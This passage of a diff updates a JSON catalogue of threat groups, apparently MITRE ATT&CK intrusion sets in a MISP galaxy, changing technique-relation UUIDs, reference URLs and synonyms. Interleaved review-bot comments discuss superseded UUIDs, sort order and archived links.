- "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926",
"tags": [
@@ -15772,27 +15553,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bd9c723-2f78-4309-82c5-47cad406572b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331",
"tags": [
@@ -15829,7 +15589,7 @@
"type": "uses"
},
{
- "dest-uuid": "861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a",
+ "dest-uuid": "8861073d-d1b8-4941-82ce-dce621d398f0",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -15842,20 +15602,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "8f104855-e5b7-4077-b1f5-bc3103b41abe",
"tags": [
@@ -15863,13 +15609,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
"tags": [
@@ -16017,13 +15756,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b4694861-542c-48ea-9eb1-10d356e7140a",
"tags": [
@@ -16052,20 +15784,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "bc76d0a4-db11-4551-9ac4-01a469cfb161",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "bd369cd9-abb8-41ce-b5bb-fff23ee86c00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bdad6f3b-de88-42fa-9295-d29b5271808e",
"tags": [
@@ -16073,13 +15791,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
"tags": [
@@ -16094,13 +15805,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "c26f1c05-b861-4970-94dc-2f7f921a3074",
"tags": [
@@ -16108,20 +15812,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c3c8c916-2f3c-4e71-94b2-240bdfc996f0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ca9d3402-ada3-484d-876a-d717bd6e05f2",
"tags": [
@@ -16143,27 +15833,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d4dc46e3-5ba5-45b9-8204-010867cacfcb",
"tags": [
@@ -16185,6 +15854,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d94b3ae9-8059-4989-8e9f-ea0f601f80a7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "deb98323-e13f-4b0c-8d94-175379069062",
"tags": [
@@ -16192,20 +15868,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "e33e4603-afab-402d-b2a1-248d435b5fe0",
"tags": [
@@ -16213,13 +15875,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add",
"tags": [
@@ -16241,13 +15896,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ed7d0cb1-87a6-43b4-9f46-ef1bc56d6c68",
"tags": [
@@ -16255,13 +15903,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "eec23884-3fa1-4d8a-ac50-6f104d51e235",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ef67e13e-5598-4adc-bdb2-998225874fa9",
"tags": [
@@ -16269,13 +15910,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f005e783-57d4-4837-88ad-dbe7faee1c51",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65",
"tags": [
@@ -16283,20 +15917,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "f59508a6-3615-47c3-b493-6676e1a39a87",
"tags": [
@@ -16311,27 +15931,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "f9cc4d06-775f-4ee1-b401-4e2cc0da30ba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db",
"tags": [
@@ -17289,6 +16888,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
"tags": [
@@ -17386,9 +16992,9 @@
"external_id": "G0096",
"refs": [
"https://attack.mitre.org/groups/G0096",
- "https://blog.group-ib.com/colunmtk_apt41",
- "https://content.fireeye.com/apt-41/rpt-apt41",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf"
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.group-ib.com/blog/colunmtk-apt41/",
+ "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf"
],
"synonyms": [
"APT41",
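Review bot: both replaced links point at the publishers' current hosts (the Group-IB blog slug keeps the original "colunmtk" spelling, which matches the old URL, and the FireEye APT41 report becomes a Mandiant PDF), and the list stays in sorted order. Since other ref updates in this same diff (FIN8, menuPass) switch to web.archive.org snapshots, consider doing the same here, or at least confirm the Mandiant PDF is the same "APT41: A Dual Espionage and Cyber Crime Operation" report the old content.fireeye.com link served, so the citation in the description still resolves to the document it was written against.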
@@ -17557,6 +17163,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "38952eac-cb1b-4a71-bad2-ee8223a1c8fe",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "3aef9463-9a7a-43ba-8957-a867e07c1e6a",
"tags": [
@@ -17662,6 +17275,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "6c575670-d14c-4c7f-9b9d-fd1b363e255d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
"tags": [
@@ -17767,6 +17387,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0",
"tags": [
@@ -18120,13 +17747,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "c8655260-9f4b-44e3-85e1-6538a5f6e4f4",
"tags": [
@@ -18141,6 +17761,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d906e6f7-434c-44c0-b51a-ed50af8f7945",
"tags": [
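Review bot: in this group the hunk at -18120 removes b3d682b6 and this one adds d511a6f6, and the same removal/addition pair recurs in later groups (-18658 with +18693, -22526 with +22575, -24743 with +24792, -27920 with +28004, -28184 with +28205, and as a shifted pair at -19771). That consistency looks like a technique UUID superseded upstream rather than per-group re-attribution, so one line in the commit message naming the old and new technique would save every reader re-deriving it; if it is not a one-to-one replacement, the groups where only one side of the pair appears need a second look.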
@@ -18219,6 +17846,13 @@
]
},
"related": [
+ {
+ "dest-uuid": "24ce266c-1860-5e04-a107-48d1d39f8ebf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "3731fbcd-0e43-47ae-ae6c-d15e510f0d42",
"tags": [
@@ -18253,13 +17887,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "24ce266c-1860-5e04-a107-48d1d39f8ebf",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "277d2f87-2ae5-4730-a3aa-50c1fdff9656",
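Review bot: the hunks at -18219 and -18253 together move the 24ce266c `similar` entry from the tail of the related array into dest-uuid order with no change to its tags or type, and the same re-sort happens for e6f4af06 (-20567 and -20587) and 96c3508e (-22145 and -22243). No content changes, but the churn suggests `similar` entries were previously appended after sorting; sorting the whole array once before emitting would keep future diffs readable.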
@@ -18457,15 +18084,7 @@
"Taidoor"
]
},
- "related": [
- {
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- }
- ],
+ "related": [],
"uuid": "59140a2e-d117-4206-9b2c-2a8662bd9d46",
"value": "Taidoor - G0015"
},
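Review bot: removing 4b74a1d4 leaves Taidoor G0015 with `"related": []`, and the same UUID is also dropped from the group at -27105 further down. An empty related list is valid JSON and consistent with how the galaxy handles groups with no relations, but please confirm whether G0015 is still an active entry upstream or has been deprecated; if the latter, the entry should carry that status rather than just an empty array.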
@@ -18475,8 +18094,8 @@
"external_id": "G0061",
"refs": [
"https://attack.mitre.org/groups/G0061",
- "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html",
- "https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html"
+ "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html",
+ "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html"
],
"synonyms": [
"FIN8"
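Review bot: only one of the two fireeye.com blog links is replaced with a web.archive.org snapshot; the 2016/05 windows-zero-day-payment-cards post keeps its live URL even though it lives on the same blog that prompted archiving the other one. For consistency and to avoid a follow-up fix when that link breaks too, archive both (the resulting sort order, web.archive.org before www.fireeye.com, is already correct here).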
@@ -18658,13 +18277,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
"tags": [
@@ -18693,6 +18305,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -19771,14 +19390,14 @@
"type": "uses"
},
{
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -20127,13 +19746,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "c9703cd3-141c-43a0-a926-380082be5d04",
"tags": [
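Review bot: c848fcf7 is dropped here and again in the hunks at -21108 and -21257, and f72eb8a8 is dropped at -22243, -26280 and -27502, in every case with no addition in the same group; unlike the b3d682b6/d511a6f6 pair elsewhere in this diff, these look like outright removals. Please confirm they correspond to techniques revoked or deprecated upstream and record that in the commit message, so the loss of these attributions is traceable.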
@@ -20567,6 +20179,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "e6f4af06-fbb5-5471-82ae-b0bdb4d446ce",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "e928333f-f3df-4039-9b8b-556c2add0e42",
"tags": [
@@ -20587,13 +20206,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "e6f4af06-fbb5-5471-82ae-b0bdb4d446ce",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "00f67a77-86a4-4adf-be26-1a54fc713340",
@@ -21108,13 +20720,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "cb69b20d-56d0-41ab-8440-4a4b251614d4",
"tags": [
@@ -21257,13 +20862,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -22145,6 +21743,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "96c3508e-f5f9-52b4-9d1e-b246d68f643d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"likely\""
+ ],
+ "type": "similar"
+ },
{
"dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
"tags": [
@@ -22243,26 +21848,12 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "96c3508e-f5f9-52b4-9d1e-b246d68f643d",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "4a2ce82e-1a74-468a-a6fb-bbead541383c",
@@ -22526,13 +22117,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "bf176076-b789-408e-8cba-7275e81c0ada",
"tags": [
@@ -22575,6 +22159,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"tags": [
@@ -23691,7 +23282,7 @@
"refs": [
"https://attack.mitre.org/groups/G0085",
"https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html",
- "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html",
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf",
"https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html"
],
"synonyms": [
@@ -23793,10 +23384,10 @@
"external_id": "G0045",
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/",
+ "http://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
"https://attack.mitre.org/groups/G0045",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage",
"https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf",
- "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf",
"https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html",
"https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html",
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf",
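Review bot: the new archived Accenture ref uses `http://web.archive.org/...` while the existing PwC archive entry two lines below uses `https://web.archive.org/...`; pick one scheme (https) so the two do not sort apart and so the link is not fetched in cleartext. The `https:/` single slash inside both archive URLs is the Wayback Machine's own canonical form, so that part is fine as is.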
@@ -24743,13 +24334,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
"tags": [
@@ -24792,6 +24376,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"tags": [
@@ -25002,7 +24593,7 @@
"https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf",
"https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/",
"https://brica.de/alerts/alert/public/1255063/kimsuky-unveils-apt-campaign-smoke-screen-aimed-at-korea-and-america/",
- "https://global.ahnlab.com/global/upload/download/techreport/[Analysis_Report]Operation%20Kabar%20Cobra.pdf",
+ "https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf",
"https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/",
"https://threatconnect.com/blog/kimsuky-phishing-operations-putting-in-work/",
"https://us-cert.cisa.gov/ncas/alerts/aa20-301a",
@@ -25716,7 +25307,7 @@
"value": "Kimsuky - G0094"
},
{
- "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit 42 Playbook Dec 2017)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)",
+ "description": "[OilRig](https://attack.mitre.org/groups/G0049) is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests.(Citation: Palo Alto OilRig April 2017)(Citation: ClearSky OilRig Jan 2017)(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: Unit42 OilRig Playbook 2023)(Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUADAGENT July 2018)",
"meta": {
"external_id": "G0049",
"refs": [
@@ -25726,6 +25317,7 @@
"http://www.clearskysec.com/oilrig/",
"https://attack.mitre.org/groups/G0049",
"https://pan-unit42.github.io/playbook_viewer/",
+ "https://pan-unit42.github.io/playbook_viewer/?pb=evasive-serpens",
"https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/",
"https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/",
"https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/",
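Review bot: the description hunk at -25716 replaces the "Unit 42 Playbook Dec 2017" citation with "Unit42 OilRig Playbook 2023", which this hunk backs with the `?pb=evasive-serpens` viewer link, but the bare `https://pan-unit42.github.io/playbook_viewer/` ref that belonged to the old citation is kept. If no remaining citation in the description or in related entries points at the generic viewer URL, drop it so the refs do not carry an orphaned source.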
@@ -25737,7 +25329,8 @@
"COBALT GYPSY",
"IRN2",
"APT34",
- "Helix Kitten"
+ "Helix Kitten",
+ "Evasive Serpens"
]
},
"related": [
@@ -26280,13 +25873,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b",
"tags": [
@@ -27105,18 +26691,18 @@
"type": "uses"
},
{
- "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5",
+ "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
},
{
- "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "dest-uuid": "d0b9840d-efe2-5200-89d1-2f1a37737e30",
"tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
+ "estimative-language:likelihood-probability=\"likely\""
],
- "type": "uses"
+ "type": "similar"
},
{
"dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62",
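Review bot: despite the three changed dest-uuid lines, the only real content change in this hunk is the removal of 4b74a1d4 (the same UUID removed from Taidoor at -18457); cc3502b5 is unchanged and merely shifts up, and d0b9840d with its "likely" tag and `similar` type is the entry the next hunk at -27145 deletes from the tail, now placed in sorted position. The tag and type changes on the paired lines are therefore an artifact of the move, not an edit to any relation.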
@@ -27145,13 +26731,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "d0b9840d-efe2-5200-89d1-2f1a37737e30",
- "tags": [
- "estimative-language:likelihood-probability=\"likely\""
- ],
- "type": "similar"
}
],
"uuid": "38863958-a201-4ce1-9dbe-539b0b6804e0",
@@ -27502,13 +27081,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "uses"
- },
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
}
],
"uuid": "f9c06633-dcff-48a1-8588-759e7cec5694",
@@ -27920,13 +27492,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b",
"tags": [
@@ -28004,6 +27569,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161",
"tags": [
@@ -28184,13 +27756,6 @@
],
"type": "uses"
},
- {
- "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
{
"dest-uuid": "b4694861-542c-48ea-9eb1-10d356e7140a",
"tags": [
@@ -28205,6 +27770,13 @@
],
"type": "uses"
},
+ {
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "uses"
+ },
{
"dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6",
"tags": [
@@ -28505,453 +28077,12 @@
]
},
"related": [
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "132d5b37-aac5-4378-a8dc-3127b18a73dc",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "uses"
- },
- {
- "dest-uuid": "1f9c2bae-b441-4f66-a8af-b65946ee72f2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
